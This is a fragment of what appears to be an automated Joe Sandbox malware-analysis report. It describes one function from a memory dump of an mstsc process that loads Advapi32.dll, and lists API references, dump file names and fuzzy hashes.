                                                                                                              Function 007F90DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(Advapi32.dll,00000000,?,007F8FD0,?,00000000,?,?,?,?,007E0140), ref: 007F90ED
                                                                                                              • GetLastError.KERNEL32(?,?,?,007E0140), ref: 007F90FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastLibraryLoad
                                                                                                              • String ID: Advapi32.dll
                                                                                                              • API String ID: 3568775529-3915320344
                                                                                                              • Opcode ID: d7194f6c763ead9e763d289497989fd2e8afaf3d38ab16c9da437e5e680dfd83
                                                                                                              • Instruction ID: 2e789ed6f4dbedeecf0f4671c66aa9afef10f5936f9e157d4e4ea76c533e5bfd
                                                                                                              • Opcode Fuzzy Hash: d7194f6c763ead9e763d289497989fd2e8afaf3d38ab16c9da437e5e680dfd83
                                                                                                              • Instruction Fuzzy Hash: DA11C13214021BABD72D9B5C984DF22BB52BB85320F2904B5EB409B3A2C63DDC819792